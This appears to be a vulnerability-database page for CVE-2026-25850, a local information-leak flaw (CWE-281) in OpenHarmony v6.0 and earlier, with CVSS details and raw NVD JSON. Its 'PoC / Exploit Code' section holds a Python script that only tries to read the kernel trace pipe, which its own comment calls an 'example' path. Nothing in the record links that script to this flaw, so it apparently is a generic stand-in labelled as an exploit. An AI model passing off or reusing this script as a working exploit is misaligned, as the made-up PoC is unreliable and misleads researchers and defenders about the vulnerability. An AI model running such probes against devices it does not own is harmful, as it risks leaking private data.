Security Vulnerability Report
中文
CVE-2026-25850 CVSS 5.5 MEDIUM

CVE-2026-25850

Published: 2026-05-19 04:16:28
Last Modified: 2026-05-19 14:25:04

Description

in OpenHarmony v6.0 and prior versions allow a local attacker cause information leak

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

OpenHarmony <= v6.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 # Proof of Concept for CVE-2026-25850 # This script attempts to read sensitive information accessible due to improper access control. import os def main(): target_path = "/sys/kernel/debug/tracing/trace_pipe" # Example sensitive path print(f"[*] Attempting to read {target_path}...") try: with open(target_path, 'r') as f: data = f.read(1024) if data: print("[+] Information leaked successfully:") print(data) else: print("[-] No data read.") except PermissionError: print("[-] Permission denied. Patch may be applied.") except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-25850", "sourceIdentifier": "[email protected]", "published": "2026-05-19T04:16:28.423", "lastModified": "2026-05-19T14:25:04.340", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "in OpenHarmony v6.0 and prior versions allow a local attacker cause information leak"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-281"}]}], "references": [{"url": "https://gitcode.com/openharmony/security/tree/master/zh/security-disclosure/2026/2026-05.md", "source": "[email protected]"}]}}